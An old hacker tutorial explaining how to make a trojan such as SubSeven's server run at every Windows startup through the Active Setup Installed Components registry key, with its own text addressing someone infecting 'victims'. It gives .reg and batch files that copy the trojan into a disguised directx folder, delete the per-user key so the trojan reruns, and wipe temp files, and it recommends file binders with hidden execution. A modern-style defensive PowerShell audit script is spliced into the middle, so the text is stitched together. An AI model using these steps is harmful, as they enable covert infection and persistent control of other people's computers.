This is a tutorial explaining the ActiveX startup method used in
SubSeven 2.2 and how to implement it for any program to run at
startup. Thanks.

 headputty
--------------------------------------------------------------------------------

THIS IS A TUTORIAL ON THE HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components STARTUP METHOD

The Active Setup Installed Components key can be used to run programs at
Windows startup. You would prefer this to other methods like win.ini,
system.ini or the RunServices key for starting programs (I mean trojans
and other programs), as it's harder to detect.
Even if your victim is not too knowledgeable on this matter, he just has
to use msconfig.exe (in Win98) or other software that shows the registry
entries in the RunServices key, and your entry (I mean the entry that your
trojan file adds) in that key can be removed easily.
I think this method was first used in SubSeven 2.2; it's my favourite. If
for some reason you want to use a trojan server that does not support this
method, read on.

Info on this method-
A key has to be created under HKEY_LOCAL_MACHINE\Software\Microsoft\Active
Setup\Installed Components\key (key stands for any key name of your
choice; I will use "ironmaiden" as an example). So I would have to
create this path-
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\ironmaiden
Inside this key, add a string value named "StubPath" whose data is the
path of your file.

example-

[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\ironmaiden]
"StubPath"="c:\\rev.exe"
(in a .reg file the backslashes in the path are doubled; I will come back
to this a little later)

You can try this on your PC with some harmless program, so that you know
what's going on.
click on Start
Run
regedit
go to HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components
create a new key
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\ironmaiden
add a new string value
rename it to StubPath and put the path of your program as its value
ex: name - StubPath, value - c:\rev.exe
restart your PC

You'll find your program runs at startup. Now go to
HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components;
you'll find a new key created with the key name you chose (here
ironmaiden). This key is created every time a new key is created in
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components.
Now delete this key and restart your PC. You'll find your program running
again.
So you would have figured out that your program starts up as long as the
entry in HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components
is not present. The trick here is to delete this key every time your
program runs, so that it runs on the next startup. I think in SubSeven 2.2
the server renames the key in HKLM each time (correct me if I am wrong here).
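Seen from the defending side, the same HKLM/HKCU comparison described above is what makes this startup method easy to audit. The PowerShell script below is an added example, not part of the original tutorial and not SubSeven's code; it assumes a modern Windows host with PowerShell and reads only the native (non-WOW6432Node) Installed Components path, and its "trusted location" regex is a heuristic of my own. It lists every HKLM component that has a StubPath, flags the ones whose HKCU copy is missing or has a different Version (so Active Setup will run them at the next logon), and marks StubPath targets that sit outside the Windows and Program Files trees.

```powershell
# Added audit example for the Active Setup startup method (not from the tutorial).
# Assumes: modern Windows with PowerShell; only the native HKLM hive is examined.
function Get-ActiveSetupAudit {
    $hklm = 'HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components'
    $hkcu = 'HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components'

    Get-ChildItem -Path $hklm -ErrorAction SilentlyContinue | ForEach-Object {
        $name  = $_.PSChildName
        $props = Get-ItemProperty -Path $_.PSPath
        $stub  = $props.StubPath
        # Components without a StubPath never execute anything, so skip them.
        if (-not $stub) { return }

        # Active Setup runs StubPath at logon when the per-user copy of the key
        # is missing (the tutorial's trick) or carries a different Version value.
        $userKey   = "$hkcu\$name"
        $userCopy  = Test-Path -Path $userKey
        $runsAgain = -not $userCopy
        if ($userCopy -and $props.Version) {
            $userVer = (Get-ItemProperty -Path $userKey).Version
            if ($userVer -ne $props.Version) { $runsAgain = $true }
        }

        # Heuristic (my assumption): stubs normally live under the Windows or
        # Program Files trees; a hand-made folder or a drive root deserves a look.
        $trusted = '^"?(%SystemRoot%|%windir%|%ProgramFiles|[A-Za-z]:\\(Windows|Program Files))'
        $suspicious = $stub -notmatch $trusted

        [pscustomobject]@{
            Component     = $name
            StubPath      = $stub
            RunsNextLogon = $runsAgain
            Suspicious    = $suspicious
        }
    }
}

# Show the entries most worth investigating first.
Get-ActiveSetupAudit |
    Sort-Object -Property RunsNextLogon, Suspicious -Descending |
    Format-Table -AutoSize
```

Run it from an elevated prompt after each logon; a component that keeps reporting RunsNextLogon as True is behaving exactly like the ironmaiden key in this tutorial and is worth inspecting.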
                   
Now here's what you need-
1) a file binder (SennaSpy One EXE Maker kicks ass; it has a lot of options
like copy to some dir and hide execution)
http://www.megasecurity.org/Binders/Files/Ssoem2.0a.zip
2) a command line registry manipulation tool (dtreg.exe is what I use,
download it from http://www.tamedos.com/downloads)
3) your trojan file

1st step
Choose a directory where you want your file to run from. I will suggest
c:\windows\system\directx as an example (you should change it to something
else). This is just to make the file harder to detect.

2nd step
Use a binder like SennaSpy or Juntador to bind your server file to a
bat file.
To create the bat file:
open Notepad
copy the following lines
//
cd system
cd directx
dtreg -deletekey "\hkcu\software\microsoft\active setup\installed components\ironmaiden"
// (without the // lines)
save the file as something.bat

Bind your file with the something.bat file (in that order, so that your
file is executed before something.bat). Suppress the output screen of
something.bat by using the hide mode in SennaSpy One EXE Maker.
This is your modified server that will start up each time. Rename it as
dxsetup.exe or something.
                           
3rd step
open Notepad
copy these lines
//

REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\ironmaiden]
"StubPath"="c:\\windows\\system\\directx\\dxsetup.exe"

// (don't include the // lines)
save it as dd.reg

create this bat file
//
cd temp
copy dxsetup.exe c:\windows\system\directx
copy dtreg.exe c:\windows\system\directx
regedit /s dd.reg
deltree /y *.*
//
save it as a bat file

Now use your binder to bind the trojan file you created in step 2,
dtreg.exe, the reg file dd.reg and the bat file you created above (in the
order given). Set the files to extract to c:\windows\temp. Disable running
of these programs; you just have to copy them to c:\windows\temp. The bound
file is the file you have to infect people with.

I am sure there are other ways of doing this. Please inform me if you know
some better way.
This is my first tutorial. Send me your suggestions at
[email protected]

HeAdpUtTy